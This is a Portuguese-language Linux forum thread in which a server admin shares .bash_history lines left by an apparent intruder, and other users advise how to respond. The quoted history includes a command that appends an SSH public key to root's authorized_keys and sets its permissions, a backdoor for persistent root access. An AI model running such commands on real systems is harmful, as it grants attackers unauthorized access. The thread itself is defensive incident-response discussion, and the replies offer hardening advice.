Ajuda...SSH invasão

bonanati
(usa Debian)

Enviado em 06/11/2009 - 09:55h

olá pessoal, tenho um servidor em uma lan house que só eu administro, recentemente fui fazer uma verificação do .bash_history e notei havia alguns comandos que não foi eu que fiz...acho que posso ser vitima de invasão, gostaria que vc´s analizassem.. obrigado.

**************************************************************
w
w
las reboot
last reboot
cat .bash_history
exit
whoami
echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIB8xn0TKSjG6Jusp0PmMDHn95tgNMPxvsVh/7jYnuwUW2GIOTJmAhx0YhEqGT0ZeUEO2+sTrZBhtqE2u17lw3c/92l8E527U77JgMxtz1M1izVaL7+UHdwWEUv4S/9eAI10dzSUx046h07RWFoBq5a2DMq3wPo1AfF/zuAfU9OZ4Q== rsa-key-20090923 >> /root/.ssh/authorized_keys
cd root
cd /root
chmod 600 .ssh/authorized_keys
chmod 700 .ssh
exit
***************************************************************

fco
(usa Slackware)

Enviado em 06/11/2009 - 10:04h

Se você foi invadido mesmo e foi só isto que o camarada fez beleza. Mas, se ele foi precavido deveria ter apagado o .bash_history. :)

Mas, vamos lá, várias medidas podem ser tomadas, algumas:

Remover a linha que foi inserida em /root/.ssh/authorized_keys

Mudar a sua senha.

Bloquear acesso de root por ssh.

Abraço.

magnolinux
(usa Debian)

Enviado em 06/11/2009 - 11:25h

como nosso amigo acima disse remova o arquivo authorized_keys, ele é uma chave permite acessar seu servidor de fora sem senha..

bloqueio login do usuario no ssh, feche todo input do seu firewall e passe a monitorar o arquivo de log do ssh, para ver se tem tentativas de invasão.

vlw.

jackadamantina
(usa Fedora)

Enviado em 06/11/2009 - 11:39h

Resolvendo,

Troque a porta padrão no seu ssh em /etc/ssh/sshd_config o ítem ports para algo como, 1380.
Apague o arquivo chamado /root/.ssh/authorized_keys, pois realmente esta entrada de chave, faz com que se logue na máuqina sem uso de senha.
Altere dentro do arquivo /etc/ssh/sshd_config o item "PermitRootLogin" para "no".

Isso vai ajudar um pouco na sua administração e novas tentativas. Outra coisa bastante, fácil de se fazer é buscar por alterações no dia e horário que logaram na sua máquina, pois talvez outras alterações tenham sido feitas.

andrezc
(usa Debian)

Enviado em 06/11/2009 - 13:18h

Jails em SSH: Montando sistema de Shell Seguro :

http://www.vivaolinux.com.br/artigo/Jails-em-SSH-Montando-sistema-de-Shell-Seguro/

Segurança no SSH via plugins da PAM

http://www.vivaolinux.com.br/artigo/Seguranca-no-SSH-via-plugins-da-PAM/